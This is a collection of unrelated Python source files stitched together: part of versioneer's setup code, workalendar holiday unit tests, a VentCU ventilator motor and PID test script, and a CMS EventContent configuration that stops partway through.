write_to_version_file(target_versionfile, versions)
cmds["build_py"] = cmd_build_py
if "cx_Freeze" in sys.modules: # cx_freeze enabled?
from cx_Freeze.dist import build_exe as _build_exe
class cmd_build_exe(_build_exe):
def run(self):
root = get_root()
cfg = get_config_from_root(root)
versions = get_versions()
target_versionfile = cfg.versionfile_source
print("UPDATING %s" % target_versionfile)
write_to_version_file(target_versionfile, versions)
_build_exe.run(self)
os.unlink(target_versionfile)
with open(cfg.versionfile_source, "w") as f:
LONG = LONG_VERSION_PY[cfg.VCS]
f.write(LONG %
{"DOLLAR": "$",
"STYLE": cfg.style,
"TAG_PREFIX": cfg.tag_prefix,
"PARENTDIR_PREFIX": cfg.parentdir_prefix,
"VERSIONFILE_SOURCE": cfg.versionfile_source,
})
cmds["build_exe"] = cmd_build_exe
del cmds["build_py"]
# we override different "sdist" commands for both environments
if "setuptools" in sys.modules:
from setuptools.command.sdist import sdist as _sdist
else:
from distutils.command.sdist import sdist as _sdist
class cmd_sdist(_sdist):
def run(self):
versions = get_versions()
self._versioneer_generated_versions = versions
# unless we update this, the command will keep using the old
# version
self.distribution.metadata.version = versions["version"]
return _sdist.run(self)
def make_release_tree(self, base_dir, files):
root = get_root()
cfg = get_config_from_root(root)
_sdist.make_release_tree(self, base_dir, files)
# now locate _version.py in the new base_dir directory
# (remembering that it may be a hardlink) and replace it with an
# updated value
target_versionfile = os.path.join(base_dir, cfg.versionfile_source)
print("UPDATING %s" % target_versionfile)
write_to_version_file(target_versionfile,
self._versioneer_generated_versions)
cmds["sdist"] = cmd_sdist
return cmds
CONFIG_ERROR = """
setup.cfg is missing the necessary Versioneer configuration. You need
a section like:
[versioneer]
VCS = git
style = pep440
versionfile_source = src/myproject/_version.py
versionfile_build = myproject/_version.py
tag_prefix =
parentdir_prefix = myproject-
You will also need to edit your setup.py to use the results:
import versioneer
setup(version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(), ...)
Please read the docstring in ./versioneer.py for configuration instructions,
edit setup.cfg, and re-run the installer or 'python versioneer.py setup'.
"""
SAMPLE_CONFIG = """
# See the docstring in versioneer.py for instructions. Note that you must
# re-run 'versioneer.py setup' after changing this section, and commit the
# resulting files.
[versioneer]
#VCS = git
#style = pep440
#versionfile_source =
#versionfile_build =
#tag_prefix =
#parentdir_prefix =
"""
INIT_PY_SNIPPET = """
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
"""
def do_setup():
"""Main VCS-independent setup function for installing Versioneer."""
root = get_root()
try:
cfg = get_config_from_root(root)
except (EnvironmentError, configparser.NoSectionError,
configparser.NoOptionError) as e:
if isinstance(e, (EnvironmentError, configparser.NoSectionError)):
print("Adding sample versioneer config to setup.cfg",
file=sys.stderr)
with open(os.path.join(root, "setup.cfg"), "a") as f:
f.write(SAMPLE_CONFIG)
print(CONFIG_ERROR, file=sys.stderr)
return 1
print(" creating %s" % cfg.versionfile_source)
with open(cfg.versionfile_source, "w") as f:
LONG = LONG_VERSION_PY[cfg.VCS]
f.write(LONG % {"DOLLAR": "$",
"STYLE": cfg.style,
"TAG_PREFIX": cfg.tag_prefix,
"PARENTDIR_PREFIX": cfg.parentdir_prefix,
"VERSIONFILE_SOURCE": cfg.versionfile_source,
})
ipy = os.path.join(os.path.dirname(cfg.versionfile_source),
"__init__.py")
if os.path.exists(ipy):
try:
with open(ipy, "r") as f:
old = f.read()
except EnvironmentError:
old = ""
if INIT_PY_SNIPPET not in old:
print(" appending to %s" % ipy)
with open(ipy, "a") as f:
f.write(INIT_PY_SNIPPET)
else:
print(" %s unmodified" % ipy)
else:
print(" %s doesn't exist, ok" % ipy)
ipy = None
# Make sure both the top-level "versioneer.py" and versionfile_source
# (PKG/_version.py, used by runtime code) are in MANIFEST.in, so
# they'll be copied into source distributions. Pip won't be able to
# install the package without this.
manifest_in = os.path.join(root, "MANIFEST.in")
simple_includes = set()
try:
with open(manifest_in, "r") as f:
for line in f:
if line.startswith("include "):
for include in line.split()[1:]:
simple_includes.add(include)
except EnvironmentError:
pass
# That doesn't cover everything MANIFEST.in can do
# (http://docs.python.org/2/distutils/sourcedist.html#commands), so
# it might give some false negatives. Appending redundant 'include'
# lines is safe, though.
if "versioneer.py" not in simple_includes:
print(" appending 'versioneer.py' to MANIFEST.in")
with open(manifest_in, "a") as f:
f.write("include versioneer.py\n")
else:
print(" 'versioneer.py' already in MANIFEST.in")
if cfg.versionfile_source not in simple_includes:
print(" appending versionfile_source ('%s') to MANIFEST.in" %
cfg.versionfile_source)
with open(manifest_in, "a") as f:
f.write("include %s\n" % cfg.versionfile_source)
else:
print(" versionfile_source already in MANIFEST.in")
# Make VCS-specific changes. For git, this means creating/changing
# .gitattributes to mark _version.py for export-time keyword
# substitution.
do_vcs_install(manifest_in, cfg.versionfile_source, ipy)
return 0
def scan_setup_py():
"""Validate the contents of setup.py against Versioneer's expectations."""
found = set()
setters = False
errors = 0
with open("setup.py", "r") as f:
for line in f.readlines():
if "import versioneer" in line:
found.add("import")
if "versioneer.get_cmdclass()" in line:
found.add("cmdclass")
if "versioneer.get_version()" in line:
found.add("get_version")
if "versioneer.VCS" in line:
setters = True
if "versioneer.versionfile_source" in line:
setters = True
if len(found) != 3:
print("")
print("Your setup.py appears to be missing some important items")
print("(but I might be wrong). Please make sure it has something")
print("roughly like the following:")
print("")
print(" import versioneer")
print(" setup( version=versioneer.get_version(),")
print(" cmdclass=versioneer.get_cmdclass(), ...)")
print("")
errors += 1
if setters:
print("You should remove lines like 'versioneer.VCS = ' and")
print("'versioneer.versionfile_source = ' . This configuration")
print("now lives in setup.cfg, and should be removed from setup.py")
print("")
errors += 1
return errors
if __name__ == "__main__":
cmd = sys.argv[1]
if cmd == "setup":
errors = do_setup()
errors += scan_setup_py()
if errors:
sys.exit(1)
|
py | 7dfa1d6607b3edcebc2001b920940783efdd0057 | from datetime import date
from datetime import datetime
from workalendar.tests import GenericCalendarTest
from workalendar.core import MON, TUE, THU, FRI
from workalendar.core import Calendar, LunarCalendar, WesternCalendar
from workalendar.core import IslamicMixin, JalaliMixin, ChristianMixin
from workalendar.core import EphemMixin
class CalendarTest(GenericCalendarTest):
def test_private_variables(self):
self.assertTrue(hasattr(self.cal, '_holidays'))
private_holidays = self.cal._holidays
self.assertTrue(isinstance(private_holidays, dict))
self.cal.holidays(2011)
self.cal.holidays(2012)
private_holidays = self.cal._holidays
self.assertTrue(isinstance(private_holidays, dict))
self.assertIn(2011, self.cal._holidays)
self.assertIn(2012, self.cal._holidays)
def test_year(self):
holidays = self.cal.holidays()
self.assertTrue(isinstance(holidays, (tuple, list)))
self.assertEquals(self.cal._holidays[self.year], holidays)
def test_another_year(self):
holidays = self.cal.holidays(2011)
self.assertTrue(isinstance(holidays, (tuple, list)))
self.assertEquals(self.cal._holidays[2011], holidays)
def test_is_working_day(self):
self.assertRaises(
NotImplementedError,
self.cal.is_working_day, date(2012, 1, 1))
def test_nth_weekday(self):
# first monday in january 2013
self.assertEquals(
Calendar.get_nth_weekday_in_month(2013, 1, MON),
date(2013, 1, 7)
)
# second monday in january 2013
self.assertEquals(
Calendar.get_nth_weekday_in_month(2013, 1, MON, 2),
date(2013, 1, 14)
)
# let's test the limits
# Jan 1st is a TUE
self.assertEquals(
Calendar.get_nth_weekday_in_month(2013, 1, TUE),
date(2013, 1, 1)
)
# There's no 6th MONday
self.assertEquals(
Calendar.get_nth_weekday_in_month(2013, 1, MON, 6),
None
)
def test_nth_weekday_start(self):
# first thursday after 18th april
start = date(2013, 4, 18)
self.assertEquals(
Calendar.get_nth_weekday_in_month(2013, 4, THU, start=start),
date(2013, 4, 18)
)
# first friday after 18th april
start = date(2013, 4, 18)
self.assertEquals(
Calendar.get_nth_weekday_in_month(2013, 4, FRI, start=start),
date(2013, 4, 19)
)
def test_last_weekday(self):
# last monday in january 2013
self.assertEquals(
Calendar.get_last_weekday_in_month(2013, 1, MON),
date(2013, 1, 28)
)
# last thursday
self.assertEquals(
Calendar.get_last_weekday_in_month(2013, 1, THU),
date(2013, 1, 31)
)
class LunarCalendarTest(GenericCalendarTest):
cal_class = LunarCalendar
def test_new_year(self):
self.assertEquals(
self.cal.lunar(2014, 1, 1),
date(2014, 1, 31)
)
class MockCalendar(Calendar):
def holidays(self, year=None):
return tuple((
(date(year, 12, 25), 'Christmas'),
(date(year, 1, 1), 'New year'),
))
def get_weekend_days(self):
return [] # no week-end, yes, it's sad
class MockCalendarTest(GenericCalendarTest):
cal_class = MockCalendar
def test_holidays_set(self):
self.assertIn(
date(self.year, 12, 25), self.cal.holidays_set(self.year))
self.assertIn(
date(self.year, 1, 1), self.cal.holidays_set(self.year))
def test_sorted_dates(self):
holidays = list(self.cal.holidays(self.year))
day, label = holidays.pop()
for next_day, label in holidays:
self.assertTrue(day <= next_day)
day = next_day
def test_add_workingdays_simple(self):
# day is out of non-working-day
self.assertEquals(
self.cal.add_working_days(date(self.year, 12, 20), 0),
date(self.year, 12, 20)
)
self.assertEquals(
self.cal.add_working_days(date(self.year, 12, 20), 1),
date(self.year, 12, 21)
)
def test_add_workingdays_on_holiday(self):
# day is in holidays
self.assertEquals(
self.cal.add_working_days(date(self.year, 12, 25), 0),
date(self.year, 12, 25)
)
self.assertEquals(
self.cal.add_working_days(date(self.year, 12, 24), 1),
date(self.year, 12, 26)
)
self.assertEquals(
self.cal.add_working_days(date(self.year, 12, 24), 2),
date(self.year, 12, 27)
)
def test_add_workingdays_span(self):
day = date(self.year, 12, 20)
# since this calendar has no weekends, we'll just have a 2-day-shift
self.assertEquals(
self.cal.add_working_days(day, 20),
date(self.year + 1, 1, 11)
)
def test_add_working_days_exceptions(self):
day = date(self.year, 12, 20)
christmas = date(self.year, 12, 25)
boxing = date(self.year, 12, 26)
# exceptional workday
self.assertEquals(
self.cal.add_working_days(day, 20, extra_working_days=[christmas]),
date(self.year + 1, 1, 10)
)
# exceptional holiday + exceptional workday
self.assertEquals(
self.cal.add_working_days(day, 20,
extra_working_days=[christmas],
extra_holidays=[boxing]),
date(self.year + 1, 1, 11)
)
def test_add_exceptions(self):
december_20th = date(self.year, 12, 20)
christmas = date(self.year, 12, 25)
# target_working_day *is* a working day
target_working_day = self.cal.add_working_days(december_20th, 1)
# Add extra working days
extra_working_days = [christmas]
# add extra holidays
extra_holidays = [target_working_day]
self.assertFalse(self.cal.is_working_day(christmas))
self.assertTrue(
self.cal.is_working_day(christmas,
extra_working_days=extra_working_days))
self.assertTrue(self.cal.is_working_day(target_working_day))
self.assertFalse(
self.cal.is_working_day(target_working_day,
extra_holidays=extra_holidays))
# test is_holiday
self.assertTrue(self.cal.is_holiday(christmas))
def test_datetime(self):
self.assertFalse(
self.cal.is_working_day(datetime(2014, 1, 1)))
class IslamicMixinTest(GenericCalendarTest):
cal_class = IslamicMixin
def test_year_conversion(self):
days = self.cal.converted(2013)
self.assertEquals(len(days), 365)
class JalaliMixinTest(GenericCalendarTest):
cal_class = JalaliMixin
def test_year_conversion(self):
days = self.cal.converted(2013)
self.assertEquals(len(days), 365)
class EphemMixinTest(GenericCalendarTest):
cal_class = EphemMixin
def test_calculate_some_equinoxes(self):
self.assertEquals(
self.cal.calculate_equinoxes(2010),
(date(2010, 3, 20), date(2010, 9, 23))
)
self.assertEquals(
self.cal.calculate_equinoxes(2010, 'Asia/Taipei'),
(date(2010, 3, 21), date(2010, 9, 23))
)
self.assertEquals(
self.cal.calculate_equinoxes(2013),
(date(2013, 3, 20), date(2013, 9, 22))
)
self.assertEquals(
self.cal.calculate_equinoxes(2014),
(date(2014, 3, 20), date(2014, 9, 23))
)
self.assertEquals(
self.cal.calculate_equinoxes(2020),
(date(2020, 3, 20), date(2020, 9, 22))
)
def test_qingming_festivals(self):
self.assertEquals(
self.cal.solar_term(2001, 15),
date(2001, 4, 4)
)
self.assertEquals(
self.cal.solar_term(2001, 15, 'Asia/Taipei'),
date(2001, 4, 5)
)
self.assertEquals(
self.cal.solar_term(2011, 15),
date(2011, 4, 5)
)
self.assertEquals(
self.cal.solar_term(2014, 15),
date(2014, 4, 4)
)
class MockChristianCalendar(WesternCalendar, ChristianMixin):
pass
class MockChristianCalendarTest(GenericCalendarTest):
cal_class = MockChristianCalendar
def test_year_2014(self):
holidays = self.cal.holidays_set(2014)
self.assertNotIn(date(2014, 1, 6), holidays) # Epiphany
self.assertNotIn(date(2014, 3, 3), holidays) # Clean Monday
self.assertNotIn(date(2014, 3, 5), holidays) # Ash Wednesday
self.assertNotIn(date(2014, 3, 25), holidays) # Annunciation
self.assertNotIn(date(2014, 4, 17), holidays) # Holy Thursday
self.assertNotIn(date(2014, 4, 18), holidays) # 'Good Friday
self.assertNotIn(date(2014, 4, 19), holidays) # Easter sat
self.assertNotIn(date(2014, 4, 20), holidays) # Easter Sun
self.assertNotIn(date(2014, 4, 21), holidays) # Easter Mon
self.assertNotIn(date(2014, 5, 29), holidays) # Ascension
self.assertNotIn(date(2014, 6, 8), holidays) # Whit Sunday
self.assertNotIn(date(2014, 6, 9), holidays) # Whit Monday
self.assertNotIn(date(2014, 6, 19), holidays) # Corp. Christi
self.assertNotIn(date(2014, 8, 15), holidays) # Assumption
self.assertNotIn(date(2014, 11, 1), holidays) # All Saints
self.assertNotIn(date(2014, 12, 8), holidays) # Imm. Conc.
self.assertNotIn(date(2014, 12, 24), holidays) # Xmas Eve
self.assertNotIn(date(2014, 12, 26), holidays) # Boxing Day
# The only Christian day that is a holiday for every calendar
self.assertIn(date(2014, 12, 25), holidays) # XMas
# Only 2 days: Jan 1st and Christmas
self.assertEquals(len(holidays), 2)
|
py | 7dfa1e52620b52ed450794077116af9e1ba29019 | #!/usr/bin/python
#
# TicDevice and PID test
# VentCU - An open source ventilator
#
# (c) VentCU, 2020. All Rights Reserved.
#
from time import sleep
from actuators.pid_controller import PID
from actuators.tic_usb import *
import pigpio
from sensors.rotary_encoder import RotaryEncoder
# define some global vars
encoder_value = 0
# create a motor controller object
ticdev = TicDevice()
ticdev.open(vendor=0x1ffb, product_id=0x00CB)
# create the encoder object
pi = pigpio.pi()
encoder = RotaryEncoder(pi, 18, 16)
# create the PID controller
pid = PID(P=100, D=12.0, I=0)
encoder_u_limit = 400
encoder_l_limit = 0
pid.setpoint = encoder_u_limit
if __name__ == "__main__":
while True:
encoder_value = encoder.value()
pid.update(encoder_value)
value = pid.output * 15000.0 if pid.output < 1000000 else 100000
ticdev.get_variables()
motor_pose = ticdev.variables['current_position']
ticdev.set_target_velocity(int(value))
print("{}, {}, {}".format(int(value), encoder_value, motor_pose))
if encoder_value == encoder_u_limit and value == 0:
# print("updating setpoint")
sleep(1.5)
pid.setpoint = encoder_l_limit
elif encoder_value == encoder_l_limit and value == 0:
# print("updating setpoint")
sleep(1.5)
pid.setpoint = encoder_u_limit
ticdev.halt_and_hold()
encoder.cancel()
pi.stop()
exit()
|
py | 7dfa1fc2efe9a4194c19a210b71d2f742dc286e3 | import FWCore.ParameterSet.Config as cms
#
# Event Content definition
#
# Data Tiers defined:
#
# LHE:
# include pure LHE production
#
# RAW , RECO, AOD:
# include reconstruction content
#
# RAWSIM, RECOSIM, AODSIM:
# include reconstruction and simulation
#
# GENRAW
# slimmed-down version of RAWSIM for small transient disk size during MC production, contains Gen+Rawdata
#
# PREMIX
# contains special Digi collection(s) for pre-mixing minbias events for pileup simulation
# Raw2Digi step is done on this file.
#
# PREMIXRAW
# extension of RAWSIM for output of second stage of PreMixing using the DataMixer.
#
# RAWDEBUG(RAWSIM+ALL_SIM_INFO), RAWDEBUGHLT(RAWDEBUG+HLTDEBUG)
#
# RAWSIMHLT (RAWSIM + HLTDEBUG)
#
# RAWRECOSIMHLT, RAWRECODEBUGHLT
#
# FEVT (RAW+RECO), FEVTSIM (RAWSIM+RECOSIM), FEVTDEBUG (FEVTSIM+ALL_SIM_INFO), FEVTDEBUGHLT (FEVTDEBUG+HLTDEBUG)
#
# $Id: EventContent_cff.py,v 1.54 2013/05/01 15:44:29 mikeh Exp $
#
#
#
#
# Recontruction Systems
#
#
from RecoLocalTracker.Configuration.RecoLocalTracker_EventContent_cff import *
from RecoLocalMuon.Configuration.RecoLocalMuon_EventContent_cff import *
from RecoLocalCalo.Configuration.RecoLocalCalo_EventContent_cff import *
from RecoEcal.Configuration.RecoEcal_EventContent_cff import *
from TrackingTools.Configuration.TrackingTools_EventContent_cff import *
from RecoTracker.Configuration.RecoTracker_EventContent_cff import *
from RecoJets.Configuration.RecoJets_EventContent_cff import *
from RecoMET.Configuration.RecoMET_EventContent_cff import *
from RecoMuon.Configuration.RecoMuon_EventContent_cff import *
from RecoBTau.Configuration.RecoBTau_EventContent_cff import *
from RecoBTag.Configuration.RecoBTag_EventContent_cff import *
from RecoTauTag.Configuration.RecoTauTag_EventContent_cff import *
from RecoVertex.Configuration.RecoVertex_EventContent_cff import *
from RecoPixelVertexing.Configuration.RecoPixelVertexing_EventContent_cff import *
from RecoEgamma.Configuration.RecoEgamma_EventContent_cff import *
from RecoParticleFlow.Configuration.RecoParticleFlow_EventContent_cff import *
from L1Trigger.Configuration.L1Trigger_EventContent_cff import *
from RecoVertex.BeamSpotProducer.BeamSpot_EventContent_cff import *
from CommonTools.ParticleFlow.EITopPAG_EventContent_cff import EITopPAGEventContent
from RecoPPS.Configuration.RecoCTPPS_EventContent_cff import *
# raw2digi that are already the final RECO/AOD products
from EventFilter.ScalersRawToDigi.Scalers_EventContent_cff import *
from EventFilter.OnlineMetaDataRawToDigi.OnlineMetaData_EventContent_cff import *
from EventFilter.Utilities.Tcds_EventContent_cff import *
#DigiToRaw content
from EventFilter.Configuration.DigiToRaw_EventContent_cff import *
#
#
# Simulation Systems
#
#
from GeneratorInterface.Configuration.GeneratorInterface_EventContent_cff import *
from SimG4Core.Configuration.SimG4Core_EventContent_cff import *
from SimTracker.Configuration.SimTracker_EventContent_cff import *
from SimMuon.Configuration.SimMuon_EventContent_cff import *
from SimCalorimetry.Configuration.SimCalorimetry_EventContent_cff import *
from SimFastTiming.Configuration.SimFastTiming_EventContent_cff import *
from SimGeneral.Configuration.SimGeneral_EventContent_cff import *
from IOMC.RandomEngine.IOMC_EventContent_cff import *
#
#
# HLT
#
#
from HLTrigger.Configuration.HLTrigger_EventContent_cff import *
#
#
# DQM
#
#
from DQMOffline.Configuration.DQMOffline_EventContent_cff import *
#
#
# NANOAOD
#
#
from PhysicsTools.NanoAOD.NanoAODEDMEventContent_cff import *
#
#
# FastSim
#
#
from FastSimulation.Configuration.EventContent_cff import FASTPUEventContent
import FastSimulation.Configuration.EventContent_cff as fastSimEC
from Configuration.Eras.Modifier_fastSim_cff import fastSim
fastSim.toModify(RecoLocalTrackerRECO, outputCommands = fastSimEC.RecoLocalTracker.outputCommands)
fastSim.toModify(RecoLocalTrackerFEVT, outputCommands = fastSimEC.RecoLocalTracker.outputCommands)
fastSim.toReplaceWith(SimG4CoreRAW, fastSimEC.SimRAW)
fastSim.toReplaceWith(SimG4CoreRECO, fastSimEC.SimRECO)
#
#
# Top level additional keep statements
#
#
CommonEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('keep *_logErrorHarvester_*_*')
)
#
#
# LHE Data Tier definition
#
#
LHEEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# RAW Data Tier definition
#
#
RAWEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *',
'keep FEDRawDataCollection_rawDataCollector_*_*',
'keep FEDRawDataCollection_source_*_*'),
splitLevel = cms.untracked.int32(0),
compressionAlgorithm=cms.untracked.string("LZMA"),
compressionLevel=cms.untracked.int32(4)
)
#
#
# RECO Data Tier definition
#
#
RECOEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# RAWRECO Data Tier definition
#
#
RAWRECOEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# AOD Data Tier definition
#
#
AODEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
eventAutoFlushCompressedSize=cms.untracked.int32(30*1024*1024),
compressionAlgorithm=cms.untracked.string("LZMA"),
compressionLevel=cms.untracked.int32(4)
)
#
#
# RAWAOD Data Tier definition
#
#
RAWAODEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
eventAutoFlushCompressedSize=cms.untracked.int32(30*1024*1024),
compressionAlgorithm=cms.untracked.string("LZMA"),
compressionLevel=cms.untracked.int32(4)
)
#
#
# RAWSIM Data Tier definition
# ===========================
#
# Here, we sacrifice memory and CPU time to decrease the on-disk size as
# much as possible. Given the current per-event GEN-SIM and DIGI-RECO times,
# the extra CPU time for LZMA compression works out to be ~1%. The GEN-SIM
# use case of reading a minbias event for `classic pileup` has a similar CPU
# impact.
# The memory increase appears to be closer to 50MB - but that should be
# acceptable as the introduction of multithreaded processing has bought us some
# breathing room.
#
RAWSIMEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
eventAutoFlushCompressedSize=cms.untracked.int32(20*1024*1024),
compressionAlgorithm=cms.untracked.string("LZMA"),
compressionLevel=cms.untracked.int32(1)
)
#
#
# RAWSIMHLT Data Tier definition
#
#
RAWSIMHLTEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# RAWRECOSIMHLT Data Tier definition
#
#
RAWRECOSIMHLTEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# RAWRECODEBUGHLT Data Tier definition
#
#
RAWRECODEBUGHLTEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# RECOSIM Data Tier definition
#
#
RECOSIMEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# GENRAW Data Tier definition
#
#
GENRAWEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# AODSIM Data Tier definition
#
#
AODSIMEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
eventAutoFlushCompressedSize=cms.untracked.int32(30*1024*1024),
compressionAlgorithm=cms.untracked.string("LZMA"),
compressionLevel=cms.untracked.int32(4),
)
#
#
# FEVT Data Tier definition
#
#
FEVTEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
FEVTHLTALLEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# FEVTSIM Data Tier definition
#
#
FEVTSIMEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# RAWDEBUG Data Tier definition
#
#
RAWDEBUGEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# RAWDEBUGHLT Data Tier definition
#
#
RAWDEBUGHLTEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# FEVTDEBUG Data Tier definition
#
#
FEVTDEBUGEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# FEVTDEBUGHLT Data Tier definition
#
#
FEVTDEBUGHLTEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# RECOSIMDEBUG Data Tier definition
#
#
RECODEBUGEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
## HLTDEBUG tier definition
#
HLTDEBUGEventContent = cms.PSet(
#outputCommands = cms.untracked.vstring('drop *',
# 'keep *_hlt*_*_*')
outputCommands = cms.untracked.vstring('drop *',
'keep *_logErrorHarvester_*_*'),
splitLevel = cms.untracked.int32(0),
)
#
#
## DQM event content
#
#
DQMEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *',
'keep *_MEtoEDMConverter_*_*'),
splitLevel = cms.untracked.int32(0)
)
#Special Event Content for MixingModule and DataMixer
DATAMIXEREventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *',
'keep CSCDetIdCSCALCTDigiMuonDigiCollection_muonCSCDigis_MuonCSCALCTDigi_*',
'keep CSCDetIdCSCCLCTDigiMuonDigiCollection_muonCSCDigis_MuonCSCCLCTDigi_*',
'keep CSCDetIdCSCComparatorDigiMuonDigiCollection_muonCSCDigis_MuonCSCComparatorDigi_*',
'keep CSCDetIdCSCCorrelatedLCTDigiMuonDigiCollection_csctfDigis_*_*',
'keep CSCDetIdCSCCorrelatedLCTDigiMuonDigiCollection_muonCSCDigis_MuonCSCCorrelatedLCTDigi_*',
'keep CSCDetIdCSCRPCDigiMuonDigiCollection_muonCSCDigis_MuonCSCRPCDigi_*',
'keep CSCDetIdCSCStripDigiMuonDigiCollection_muonCSCDigis_MuonCSCStripDigi_*',
'keep CSCDetIdCSCWireDigiMuonDigiCollection_muonCSCDigis_MuonCSCWireDigi_*',
'keep DTLayerIdDTDigiMuonDigiCollection_muonDTDigis_*_*',
'keep PixelDigiedmDetSetVector_siPixelDigis_*_*',
'keep SiStripDigiedmDetSetVector_siStripDigis_*_*',
'keep RPCDetIdRPCDigiMuonDigiCollection_muonRPCDigis_*_*',
'keep HBHEDataFramesSorted_hcalDigis_*_*',
'keep HFDataFramesSorted_hcalDigis_*_*',
'keep HODataFramesSorted_hcalDigis_*_*',
'keep QIE10DataFrameHcalDataFrameContainer_hcalDigis_*_*',
'keep QIE11DataFrameHcalDataFrameContainer_hcalDigis_*_*',
'keep ZDCDataFramesSorted_hcalDigis_*_*',
'keep CastorDataFramesSorted_castorDigis_*_*',
'keep EBDigiCollection_ecalDigis_*_*',
'keep EEDigiCollection_ecalDigis_*_*',
'keep ESDigiCollection_ecalPreshowerDigis_*_*'),
splitLevel = cms.untracked.int32(0),
)
PREMIXEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
MIXINGMODULEEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *',
'keep *_cfWriter_*_*'),
splitLevel = cms.untracked.int32(0),
)
# PREMIXRAW Data Tier definition
#
#
PREMIXRAWEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
## RAW repacked event content definition
#
#
REPACKRAWEventContent = cms.PSet(
outputCommands = cms.untracked.vstring(
'drop *',
'drop FEDRawDataCollection_*_*_*',
'keep FEDRawDataCollection_rawDataRepacker_*_*',
'keep FEDRawDataCollection_virginRawDataRepacker_*_*',
'keep FEDRawDataCollection_rawDataReducedFormat_*_*'),
splitLevel = cms.untracked.int32(0),
)
REPACKRAWSIMEventContent = cms.PSet(
outputCommands = cms.untracked.vstring(),
splitLevel = cms.untracked.int32(0),
)
LHEEventContent.outputCommands.extend(GeneratorInterfaceLHE.outputCommands)
HLTDEBUGEventContent.outputCommands.extend(HLTDebugFEVT.outputCommands)
RAWEventContent.outputCommands.extend(L1TriggerRAW.outputCommands)
RAWEventContent.outputCommands.extend(HLTriggerRAW.outputCommands)
REPACKRAWEventContent.outputCommands.extend(L1TriggerRAW.outputCommands)
REPACKRAWEventContent.outputCommands.extend(HLTriggerRAW.outputCommands)
RECOEventContent.outputCommands.extend(RecoLocalTrackerRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoLocalMuonRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoLocalCaloRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoEcalRECO.outputCommands)
RECOEventContent.outputCommands.extend(TrackingToolsRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoTrackerRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoJetsRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoMETRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoMuonRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoBTauRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoBTagRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoTauTagRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoVertexRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoEgammaRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoPixelVertexingRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoParticleFlowRECO.outputCommands)
RECOEventContent.outputCommands.extend(BeamSpotRECO.outputCommands)
RECOEventContent.outputCommands.extend(L1TriggerRECO.outputCommands)
RECOEventContent.outputCommands.extend(HLTriggerRECO.outputCommands)
RECOEventContent.outputCommands.extend(MEtoEDMConverterRECO.outputCommands)
RECOEventContent.outputCommands.extend(EvtScalersRECO.outputCommands)
RECOEventContent.outputCommands.extend(OnlineMetaDataContent.outputCommands)
RECOEventContent.outputCommands.extend(TcdsEventContent.outputCommands)
RECOEventContent.outputCommands.extend(CommonEventContent.outputCommands)
RECOEventContent.outputCommands.extend(EITopPAGEventContent.outputCommands)
from Configuration.Eras.Modifier_ctpps_2016_cff import ctpps_2016
ctpps_2016.toModify(RECOEventContent, outputCommands = RECOEventContent.outputCommands + RecoCTPPSRECO.outputCommands)
RAWRECOEventContent.outputCommands.extend(RECOEventContent.outputCommands)
RAWRECOEventContent.outputCommands.extend(cms.untracked.vstring(
'keep FEDRawDataCollection_rawDataCollector_*_*',
'keep FEDRawDataCollection_source_*_*'
))
